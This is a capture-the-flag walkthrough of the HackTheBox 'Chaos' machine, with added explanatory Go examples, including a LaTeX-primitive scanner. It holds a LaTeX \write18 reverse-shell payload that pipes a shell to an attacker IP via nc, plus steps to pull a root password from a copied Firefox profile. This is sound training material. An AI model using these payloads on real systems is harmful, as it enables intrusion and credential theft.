How to solve ‘Chaos’

Philippe Delteil
7 min read, May 25, 2019


Step-by-step guide to solving the Chaos machine.

USER

Enumeration

As always, the first thing we do is a port scan with nmap:

nmap -v -sC -sV chaos.htb

Output:

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL STLS UIDL TOP CAPA AUTH-RESP-CODE RESP-CODES
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-28T10:01:49
| Not valid after: 2028-10-25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: Pre-login ID more LOGIN-REFERRALS SASL-IR ENABLE STARTTLS post-login have listed LITERAL+ IMAP4rev1 capabilities OK LOGINDISABLEDA0001 IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-28T10:01:49
| Not valid after: 2028-10-25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: Pre-login ID LOGIN-REFERRALS SASL-IR ENABLE OK post-login more have LITERAL+ IMAP4rev1 listed capabilities AUTH=PLAINA0001 IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-28T10:01:49
| Not valid after: 2028-10-25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL(PLAIN) USER UIDL TOP CAPA AUTH-RESP-CODE RESP-CODES
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-28T10:01:49
| Not valid after: 2028-10-25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: EA9A0A98E2A16B0ADEA1F6ED448F4CEF
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Dirb

http://chaos/index.html
http://chaos/wp
http://chaos/wp/wordpress
http://chaos/wp/wordpress/index.php
http://chaos/wp/wordpress/wp-includes
http://chaos/wp/wordpress/wp-content
http://chaos/wp/wordpress/wp-admin
http://chaos/index.html
http://chaos/wp
http://chaos/wp/wordpress
http://chaos/wp/wordpress/index.php
http://chaos/wp/wordpress/wp-content
http://chaos/wp/wordpress/wp-content/index.php
http://chaos/wp/wordpress/wp-content/plugins
http://chaos/wp/wordpress/wp-content/themes
http://chaos/wp/wordpress/wp-includes
http://chaos/wp/wordpress/wp-includes/certificates
http://chaos/wp/wordpress/wp-admin
http://chaos/wp/wordpress/wp-admin/admin.php
http://chaos/wp/wordpress/wp-admin/css
http://chaos/wp/wordpress/wp-admin/images
http://chaos/wp/wordpress/wp-admin/includes
http://chaos/wp/wordpress/wp-admin/index.php
http://chaos/wp/wordpress/wp-admin/js
http://chaos/wp/wordpress/wp-admin/maint
http://chaos/wp/wordpress/wp-admin/network
http://chaos/wp/wordpress/wp-admin/user

We load http://10.10.10.120/wp/wordpress/

To reach this protected page we must use the password human, which we deduced from noticing that the author of the post was HUMAN.

After entering the password:

To get into the mailbox we use openssl, with the credentials found on the WordPress page:

> openssl s_client -showcerts -connect 10.10.10.120:993 -crlf

We authenticate as follows:

A LOGIN ayush jiujitsu

The server's response tells us that there is a message in the Drafts folder.

We read the message in the Drafts folder:

TAG FETCH 1 (BODY[text])

The message is as follows:

MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowed
Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804
[base64-encoded body of en.py, identical to the block quoted below]
--=_00b34a28b9033c43ed09c0950f4176e1--
)
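Rather than copying the base64 blocks out of the IMAP output by hand, the draft can be parsed as a MIME message. The following Go program is an added example (not part of the original writeup and not the box's code): it walks a multipart/mixed message with the same layout as the draft above (a text part plus two base64 attachments), decodes each base64 body and returns the attachments by filename. The message embedded in it is constructed with placeholder attachment contents, not the real enim_msg.txt or en.py.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"io"
	"mime"
	"mime/multipart"
	"net/mail"
	"strings"
)

// Attachment is one MIME part that carried a filename, with its body decoded.
type Attachment struct {
	Filename string
	Data     []byte
}

// sampleMessage is a constructed message with the same layout as the draft on
// the page. The attachment bodies are placeholders, not the real files.
const sampleMessage = "MIME-Version: 1.0\r\n" +
	"Content-Type: multipart/mixed; boundary=\"=_boundary_placeholder\"\r\n" +
	"From: ayush <ayush@localhost>\r\n" +
	"Subject: service\r\n" +
	"\r\n" +
	"--=_boundary_placeholder\r\n" +
	"Content-Transfer-Encoding: 7bit\r\n" +
	"Content-Type: text/plain; charset=US-ASCII\r\n" +
	"\r\n" +
	"Hii, sahay\r\n" +
	"Check the enmsg.txt\r\n" +
	"--=_boundary_placeholder\r\n" +
	"Content-Transfer-Encoding: base64\r\n" +
	"Content-Type: application/octet-stream; name=enim_msg.txt\r\n" +
	"Content-Disposition: attachment; filename=enim_msg.txt\r\n" +
	"\r\n" +
	"cGxhY2Vob2xkZXIgY2lwaGVydGV4dA==\r\n" + // "placeholder ciphertext"
	"--=_boundary_placeholder\r\n" +
	"Content-Transfer-Encoding: base64\r\n" +
	"Content-Type: text/x-python; name=en.py\r\n" +
	"Content-Disposition: attachment; filename=en.py\r\n" +
	"\r\n" +
	"cHJpbnQoImhlbGxvIik=\r\n" + // print("hello")
	"--=_boundary_placeholder--\r\n"

// extractAttachments parses a multipart message and returns the plain-text
// body plus every part that declares a filename. Go's multipart reader only
// decodes quoted-printable by itself, so base64 bodies are decoded here.
func extractAttachments(raw string) (string, []Attachment, error) {
	msg, err := mail.ReadMessage(strings.NewReader(raw))
	if err != nil {
		return "", nil, err
	}
	mediaType, params, err := mime.ParseMediaType(msg.Header.Get("Content-Type"))
	if err != nil {
		return "", nil, err
	}
	if !strings.HasPrefix(mediaType, "multipart/") {
		return "", nil, fmt.Errorf("expected a multipart message, got %s", mediaType)
	}
	var body string
	var atts []Attachment
	mr := multipart.NewReader(msg.Body, params["boundary"])
	for {
		part, err := mr.NextPart()
		if err == io.EOF {
			break
		}
		if err != nil {
			return "", nil, err
		}
		data, err := io.ReadAll(part)
		if err != nil {
			return "", nil, err
		}
		if strings.EqualFold(part.Header.Get("Content-Transfer-Encoding"), "base64") {
			// Remove the line folding before decoding.
			compact := strings.Join(strings.Fields(string(data)), "")
			if data, err = base64.StdEncoding.DecodeString(compact); err != nil {
				return "", nil, fmt.Errorf("part %q: %w", part.FileName(), err)
			}
		}
		if name := part.FileName(); name != "" {
			atts = append(atts, Attachment{Filename: name, Data: data})
		} else {
			body = string(data)
		}
	}
	return body, atts, nil
}

func main() {
	body, atts, err := extractAttachments(sampleMessage)
	if err != nil {
		panic(err)
	}
	fmt.Printf("body: %q\n", body)
	for _, a := range atts {
		fmt.Printf("attachment %s (%d bytes): %q\n", a.Filename, len(a.Data), a.Data)
	}
}
```

The same parser is what a mail gateway would run to inspect attachments: here the Content-Type of the second part (text/x-python) and its .py filename are exactly the signals that a script attachment policy keys on.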

The source code of en.py (the second attachment, alongside enim_msg.txt) is base64-encoded:

ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK

To decode it we run:

> cat file | base64 -d

And we get the following code:

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

We need to analyze the source code and write a function that decrypts the file, in Python:

#!/usr/bin/python
import sys
import os
import struct
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

#print 'Number of arguments:', len(sys.argv), 'arguments.'
#print 'Argument List:', str(sys.argv)

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def decrypt(key, in_filename, out_filename=None):
    if not out_filename:
        out_filename = os.path.splitext(in_filename)[0]

    chunksize = 24*1024

    with open(in_filename, 'rb') as infile:
        # Size of the encrypted file itself, not the plaintext size that
        # en.py stored in the first 16 bytes of the file.
        origsize = str(os.path.getsize(in_filename)).zfill(16)
        # en.py writes the 16-byte size header before the IV, so this reads
        # the header as the IV. With CBC that only garbles the first block.
        iv = infile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)

        with open(out_filename, 'wb') as outfile:
            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(decryptor.decrypt(chunk))

            outfile.truncate(int(origsize))

def getKey(password):
    encoded = password.encode('utf-8')
    print(encoded)
    hasher = SHA256.new(encoded)
    return hasher.digest()

key = str(sys.argv[1])
filename = str(sys.argv[2])
fileout = str(sys.argv[3])
key2 = getKey(key)
print(key2)
decrypt(key2, filename, fileout)

We run it as follows:

python decrypt.py sahay encripted_msg.txt output.txt

Which gives us:

š�TW�sLPOg���SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK

Then we strip the malformed characters and decode the rest:

> echo "SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK"| base64 -d

Which returns:

Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush
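To make en.py's file layout concrete and to explain the 16 garbled bytes at the start of the decrypted output, here is an added Go example (not part of the original writeup and not the author's decrypt.py) that re-implements the format with the standard library: a 16-byte zero-padded decimal length, a 16-byte random IV, then AES-256-CBC ciphertext with SHA-256(password) as the key and space padding. decryptFile reads the length header before the IV; decryptSkippingHeader reproduces what decrypt.py does, reading the header as the IV and handing the real IV to the cipher as the first ciphertext block. In CBC each plaintext block is D(C_i) XOR C_(i-1), so only the first output block is wrong and the chain resynchronises from the second block on. The plaintext is constructed; the only value taken from the page is the password sahay.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"io"
	"strconv"
)

const blockSize = 16

// getKey mirrors en.py: the AES-256 key is the SHA-256 digest of the password.
func getKey(password string) []byte {
	sum := sha256.Sum256([]byte(password))
	return sum[:]
}

// padSpaces mirrors en.py's padding: ASCII spaces up to the next 16-byte boundary.
// Space padding is ambiguous for plaintexts ending in spaces, which is why the
// format carries an explicit length header instead of relying on the padding.
func padSpaces(b []byte) []byte {
	if rem := len(b) % blockSize; rem != 0 {
		b = append(b, bytes.Repeat([]byte{' '}, blockSize-rem)...)
	}
	return b
}

// encryptFile writes the same layout as en.py: length header, IV, CBC ciphertext.
func encryptFile(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, blockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	padded := padSpaces(append([]byte(nil), plaintext...))
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)

	out := []byte(fmt.Sprintf("%016d", len(plaintext)))
	out = append(out, iv...)
	return append(out, ct...), nil
}

// decryptFile parses the header, then the IV, decrypts the rest and trims to the
// original length. Malformed or non-block-aligned input is rejected rather than
// padded as decrypt.py does. Note that nothing here is authenticated: the header
// and the ciphertext can be altered without the decryptor noticing.
func decryptFile(key, data []byte) ([]byte, error) {
	if len(data) < 2*blockSize || (len(data)-2*blockSize)%blockSize != 0 {
		return nil, fmt.Errorf("malformed input: %d bytes", len(data))
	}
	origSize, err := strconv.Atoi(string(data[:blockSize]))
	if err != nil {
		return nil, fmt.Errorf("bad length header: %w", err)
	}
	iv, ct := data[blockSize:2*blockSize], data[2*blockSize:]
	if origSize < 0 || origSize > len(ct) {
		return nil, fmt.Errorf("length header %d does not fit %d ciphertext bytes", origSize, len(ct))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pt[:origSize], nil
}

// decryptSkippingHeader reproduces decrypt.py: the length header is used as the
// IV and the real IV is decrypted as if it were ciphertext. Only the first
// output block is garbage; every later block is intact.
func decryptSkippingHeader(key, data []byte) ([]byte, error) {
	if len(data) < blockSize || (len(data)-blockSize)%blockSize != 0 {
		return nil, fmt.Errorf("malformed input: %d bytes", len(data))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	wrongIV, ct := data[:blockSize], data[blockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, wrongIV).CryptBlocks(pt, ct)
	return pt, nil
}

func main() {
	key := getKey("sahay") // password from the draft; the message below is constructed
	msg := []byte("Hii Sahay\n\nconstructed plaintext standing in for enim_msg.txt\n")
	enc, err := encryptFile(key, msg)
	if err != nil {
		panic(err)
	}
	good, _ := decryptFile(key, enc)
	bad, _ := decryptSkippingHeader(key, enc)
	fmt.Printf("header %q, %d ciphertext bytes\n", enc[:16], len(enc)-32)
	fmt.Printf("correct decrypt:   %q\n", good)
	fmt.Printf("decrypt.py-style:  %q\n", bad)
}
```

The decrypt.py-style output shows one block of noise followed by the padded plaintext, which is exactly the shape of the output above before the manual clean-up.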

We need to edit /etc/hosts to add chaos.htb; we append the following:

echo "10.10.10.120 chaos.htb" >> /etc/hosts

We visit the URL http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Reverse shell

First we start a listener on our machine:

> nc -lvp 6699

Then, to get the reverse shell, we enter the following code in the form:

\immediate\write18{mknod /tmp/backpipe p ;/bin/sh 0</tmp/backpipe | nc 10.10.14.5 6699 1>/tmp/backpipe}
\newread\file
\openin\file=test.txt
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

This gives us a reverse shell. (If it doesn't work, change the file name in every instance.)

Next we select the template test2 and click "Create PDF".
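The service is exploitable because it compiles user-supplied TeX with shell escape enabled, so \write18 runs whatever command the document contains, and \openin/\read let the document read server files. The fix on the server side is to compile with shell escape off (pdflatex's -no-shell-escape flag) inside an unprivileged sandbox; the Go program below is an added example (not part of the original writeup and not the box's code) of the defence-in-depth screening a PDF service can add on top of that: it flags the primitives in a submission before compilation and builds the hardened pdflatex argument list. The primitive list and the sample submission are constructed for this example, with a placeholder in place of any real command.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one TeX primitive that user input should never reach the compiler with.
type Finding struct {
	Line      int
	Primitive string
	Text      string
}

// Primitives that turn a document into a command runner or a file reader.
// This list is constructed for the example and deliberately small: it is a
// screening aid, not a substitute for compiling with shell escape disabled.
var dangerousPrimitives = []*regexp.Regexp{
	regexp.MustCompile(`\\write18\b`), // shell escape
	regexp.MustCompile(`\\openin\b`),  // open a file for \read
	regexp.MustCompile(`\\read\b`),
	regexp.MustCompile(`\\input\b`), // inline another file
	regexp.MustCompile(`\\include\b`),
}

// scanLaTeX returns every line of a submission that uses one of the primitives,
// numbered from 1 so the finding can be reported back or logged.
func scanLaTeX(doc string) []Finding {
	var findings []Finding
	for i, line := range strings.Split(doc, "\n") {
		for _, re := range dangerousPrimitives {
			if loc := re.FindStringIndex(line); loc != nil {
				findings = append(findings, Finding{
					Line:      i + 1,
					Primitive: line[loc[0]:loc[1]],
					Text:      strings.TrimSpace(line),
				})
			}
		}
	}
	return findings
}

// pdflatexArgs builds the argument list for compiling a submission with shell
// escape off. -no-shell-escape, -halt-on-error, -interaction and
// -output-directory are real pdflatex flags; the paths are caller-supplied.
func pdflatexArgs(texFile, outDir string) []string {
	return []string{
		"-no-shell-escape",
		"-halt-on-error",
		"-interaction=nonstopmode",
		"-output-directory=" + outDir,
		texFile,
	}
}

// sampleSubmission is constructed: it has the shape of the payload on the page
// with a placeholder where the command would be.
const sampleSubmission = `\documentclass{article}
\begin{document}
Hello
\immediate\write18{placeholder-command}
\newread\file
\openin\file=test.txt
\closein\file
\end{document}`

func main() {
	for _, f := range scanLaTeX(sampleSubmission) {
		fmt.Printf("line %d: %s in %q\n", f.Line, f.Primitive, f.Text)
	}
	fmt.Println("compile with:", strings.Join(pdflatexArgs("job.tex", "/tmp/out"), " "))
}
```

Scanning catches the obvious cases and gives the service something to log and alert on; it does not replace disabling shell escape, because TeX has more ways to reach the same primitives than any blocklist covers.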

Upgrading the shell

python -c 'import pty; pty.spawn("/bin/bash")'

Logging in as user ayush:

> su - ayush

With the password ‘jiujitsu’, we find the user flag!

ROOT

Inside the ayush account:

We set PATH:

> PATH=$PATH:/bin:/usr/bin

Inside the user's home directory we find a hint: a Firefox profile folder.

In .mozilla/firefox/bzo7sjt1.default

We copy the files key4.db and logins.json into an existing Firefox profile. After opening Firefox with the copied files in the profile path (usually something like .mozilla/firefox/profiles), we go to the browser settings and navigate to Preferences -> Privacy & Security -> Logins & Passwords.

Then we click “Saved Logins” and the following screen appears:

We can already see that the username is ‘root’. We click “Show Passwords” and a dialog asks for the master password, which is ‘jiujitsu’.

The password is Thiv8wrej~

We use this password to log in as root on the server.

> su - root

And we get the flag:

4eca7e09e3520e0XXXX63cfbabbc70
